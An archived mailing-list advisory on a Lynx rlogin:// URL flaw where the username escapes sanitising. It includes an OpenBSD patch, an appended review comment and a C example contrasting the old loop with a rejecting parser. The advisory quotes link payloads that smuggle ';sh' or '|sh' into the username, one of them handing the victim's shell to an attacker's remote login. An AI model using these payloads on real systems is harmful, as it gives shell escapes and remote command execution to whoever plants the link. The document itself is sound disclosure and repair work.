Lynx has a feature that allows trojans. For users on systems where lynx is the login shell or somehow the only program allowed to run, the user can obtain a shell by simply "clicking" a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.

Running hostile code is also easy with this feature: <a href="rlogin://eviluser|shat_private">foo</a>. The login shell (or something similar) for eviluserat_private prints out a few commands to run on the victim.

The problem is in WWW/Library/Implementation/HTTelnet.c in the function remote_session. It strips off "bad" characters ('|', ';') from everything except the username:

/*
 * Modified to allow for odd chars in a username only if exists.
 * 05-28-94 Lynx 2-3-1 Garrett Arch Blythe
 */

That was a bad decision. The obvious fix is to be more paranoid than "user friendly".

//art

(diff made to the OpenBSD cvs repository, so the line numbers can be wrong)

Index: HTTelnet.c
===================================================================
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c 1998/03/11 17:47:47 1.1.1.1
+++ HTTelnet.c 1998/11/16 17:01:35
@@ -73,8 +73,7 @@ * *cp=0; / * terminate at any ;,<,>,`,|,",' or space or return * or tab to prevent security whole */ - for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0'; - cp++) { + for(cp = host; *cp != '\0'; cp++) { if(!isalnum(*cp) && *cp != '_' && *cp != '-' && *cp != ':' && *cp != '.' && *cp != '@') { *cp = '\0';
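Review bot: the loop in this hunk still silently truncates at the first disallowed byte (`*cp = '\0';`) instead of rejecting the URL, so after the change `rlogin://foo;sh@foo` quietly becomes a session to `foo` with no indication that the link was tampered with; refusing to open the session when any byte outside the whitelist appears would be both safer and less surprising to the user. Two smaller points: `isalnum(*cp)` should be `isalnum((unsigned char)*cp)` so a high-bit byte is not passed to the ctype macro as a negative value, and the `Modified to allow for odd chars in a username only if exists` comment quoted above this loop describes behaviour the patch removes, so it should be deleted in the same diff (the `-w` on the diff command line also means any whitespace changes in this region are not shown, so the reviewer should apply it rather than read it).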
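The mechanism the post describes (sanitizing only from the '@' onwards) and the whitelist approach of the fix, as an added C example that is not Lynx's code: `old_sanitize` mimics the pre-fix loop so the username can be seen passing through untouched, and `parse_rlogin_url` is an assumed rejecting design (not what the patch does) that refuses the whole URL on any disallowed byte, treats a leading '-' in user or host as an attempt to smuggle an rlogin option, and hands the clean pieces to `build_rlogin_argv` for an execvp-style call with no shell in between. The function names and the constructed sample URLs beyond the post's two are assumptions.

```c
/* Added example, not Lynx code: the username-skipping sanitizer the post
 * describes, beside a rejecting whitelist parser and a shell-free argv. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The byte whitelist the post's patch applies to "user@host". */
static int allowed(unsigned char c)
{
    return isalnum(c) || c == '_' || c == '-' || c == ':' || c == '.' || c == '@';
}

/* Mimics the pre-fix loop: scanning starts at '@' when one is present, so
 * everything before it (the username) is never inspected. Truncates in place. */
void old_sanitize(char *host)
{
    char *cp;
    for (cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0'; cp++) {
        if (!allowed((unsigned char)*cp))
            *cp = '\0';
    }
}

/* Hypothetical hardened parser: splits "rlogin://[user@]host[/...]" into
 * user (may be empty) and host. Returns 0 on success, -1 if any byte of the
 * authority is outside the whitelist, if there is more than one '@', if a
 * part starts with '-' (would be parsed by rlogin as an option), or if a
 * buffer is too small. Nothing is rewritten silently. */
int parse_rlogin_url(const char *url, char *user, size_t ulen, char *host, size_t hlen)
{
    const char *prefix = "rlogin://";
    const char *p, *end, *at, *hstart, *q;
    size_t n;

    if (strncmp(url, prefix, strlen(prefix)) != 0)
        return -1;
    p = url + strlen(prefix);
    end = strchr(p, '/');              /* a path part must not leak into host */
    if (end == NULL)
        end = p + strlen(p);
    if (end == p)
        return -1;                     /* empty authority */
    for (q = p; q < end; q++)
        if (!allowed((unsigned char)*q))
            return -1;                 /* reject, do not truncate */
    at = memchr(p, '@', (size_t)(end - p));
    if (at != NULL && memchr(at + 1, '@', (size_t)(end - at - 1)) != NULL)
        return -1;                     /* ambiguous user/host split */
    if (at != NULL) {
        n = (size_t)(at - p);
        hstart = at + 1;
    } else {
        n = 0;
        hstart = p;
    }
    if (n >= ulen || (n > 0 && p[0] == '-'))
        return -1;
    memcpy(user, p, n);
    user[n] = '\0';
    n = (size_t)(end - hstart);
    if (n == 0 || n >= hlen || hstart[0] == '-')
        return -1;
    memcpy(host, hstart, n);
    host[n] = '\0';
    return 0;
}

/* Fills argv for execvp("rlogin", argv): with no shell involved, ';' or '|'
 * could at worst be part of a hostname, never a command separator.
 * Returns argc. argv must have room for 5 entries. */
int build_rlogin_argv(const char *user, const char *host, const char *argv[5])
{
    int argc = 0;
    argv[argc++] = "rlogin";
    if (user[0] != '\0') {
        argv[argc++] = "-l";
        argv[argc++] = user;
    }
    argv[argc++] = host;
    argv[argc] = NULL;
    return argc;
}

int main(void)
{
    char buf[32], user[64], host[64];
    const char *argv[5];
    const char *urls[] = { "rlogin://foo;sh@foo", "rlogin://eviluser|sh@host",
                           "rlogin://bob@host.example.net/", "rlogin://-n@host" };
    size_t i;

    strcpy(buf, "foo;sh@foo");          /* the post's first link */
    old_sanitize(buf);
    printf("old sanitizer leaves: %s\n", buf);
    for (i = 0; i < sizeof urls / sizeof urls[0]; i++) {
        if (parse_rlogin_url(urls[i], user, sizeof user, host, sizeof host) == 0) {
            build_rlogin_argv(user, host, argv);
            printf("%s -> exec rlogin%s%s %s\n", urls[i],
                   user[0] ? " -l " : "", user, host);
        } else {
            printf("%s -> rejected\n", urls[i]);
        }
    }
    return 0;
}
```

The old loop is reproduced only to make the flaw visible; the parser's decision to reject rather than truncate is the design point, and the leading '-' check matters the moment you stop going through a shell and pass the pieces as argv.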
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:40 PDT